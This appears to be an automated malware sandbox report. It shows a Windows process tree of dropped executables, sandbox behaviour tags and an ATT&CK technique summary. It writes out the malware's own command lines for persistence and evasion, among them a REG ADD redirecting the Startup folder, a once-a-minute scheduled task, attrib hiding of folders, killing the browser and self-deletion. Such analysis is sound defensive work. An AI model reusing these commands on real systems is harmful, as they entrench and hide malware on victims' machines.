C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe10⤵PID:2420
-
C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe11⤵
- Executes dropped EXE
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:2888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵PID:2772
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:892
-
-
C:\Users\Admin\AppData\Local\Temp\downloadmanager\downloadmanager.exe"C:\Users\Admin\AppData\Local\Temp\downloadmanager.\downloadmanager.exe"14⤵
- Executes dropped EXE
PID:2428 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\tvpd.vbs" /f=CREATE_NO_WINDOW install.cmd15⤵PID:828
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\GUI\TVtuner\301le.bat" "16⤵PID:3016
-
C:\Windows\SysWOW64\timeout.exetimeout 717⤵
- Delays execution with timeout.exe
PID:2188
-
-
C:\GUI\TVtuner\tvps.exe"tvps.exe" e -pVusya78gasxhgxahghxsahgV insl.rar17⤵
- Executes dropped EXE
PID:3224
-
-
C:\Windows\SysWOW64\timeout.exetimeout 617⤵
- Delays execution with timeout.exe
PID:3272
-
-
C:\Windows\SysWOW64\timeout.exetimeout 817⤵
- Delays execution with timeout.exe
PID:3688
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\spr.vbs"17⤵PID:3680
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\GUI\TVtuner\G7.bat" "18⤵PID:3840
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\GUI"19⤵
- Views/modifies file attributes
PID:3876
-
-
C:\Windows\SysWOW64\timeout.exetimeout 219⤵
- Delays execution with timeout.exe
PID:3904
-
-
C:\GUI\TVtuner\civdata.execivdata.exe /start19⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3980 -
C:\GUI\TVtuner\civdata.execivdata.exe /start20⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tvps.exe19⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tvps.exe19⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\GUI\TVtuner"19⤵
- Views/modifies file attributes
PID:3928
-
-
C:\Windows\SysWOW64\timeout.exetimeout 419⤵
- Delays execution with timeout.exe
PID:3912
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exeFoxyIDM621d.exe10⤵
- Executes dropped EXE
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵
- Executes dropped EXE
PID:2484
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe4⤵
- Loads dropped DLL
PID:848 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun150faeb3537d.exeSun150faeb3537d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone4⤵
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun157a449716c8ee483.exeSun157a449716c8ee483.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun157a449716c8ee483.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun157a449716c8ee483.exe" & exit6⤵PID:2320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun157a449716c8ee483.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe4⤵
- Loads dropped DLL
PID:824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun1584240df9fe73a3.exeSun1584240df9fe73a3.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\ProgramData\5023654.exe"C:\ProgramData\5023654.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:788
-
-
C:\ProgramData\7952530.exe"C:\ProgramData\7952530.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 17123⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2932 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2268
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1628 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2608
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {101EC1B3-8D19-4DE7-8E7D-CCB9C299BDEC} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:2636
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe3⤵PID:3116
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1359021745950058154-688823350-2565690611243455514-77911026464230224-1842501403"1⤵PID:2888
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1000 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:328
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 85E9E1B127F1A7CF43F5AA9917A442B7 C2⤵PID:2108
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADA801DBC7155F18120586921F51DE492⤵
- Blocklisted process makes network request
PID:3848 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3356
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DC813459494F3023C0CEA176273CB6C6 M Global\MSI00002⤵PID:1536
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "309524963-621916548-713178348-163430674566676366-6133520851047704801-1283110743"1⤵PID:3688
-
C:\Windows\system32\taskeng.exetaskeng.exe {BE15F5BE-E86E-4098-848D-0303512E73B6} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1288
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵
- Executes dropped EXE
PID:3000
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵
- Executes dropped EXE
PID:3340
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵
- Executes dropped EXE
PID:2252
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵
- Executes dropped EXE
PID:2244
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵
- Executes dropped EXE
PID:2196
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3756
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Hidden Files and Directories
2Install Root Certificate
1Modify Registry
3Web Service
1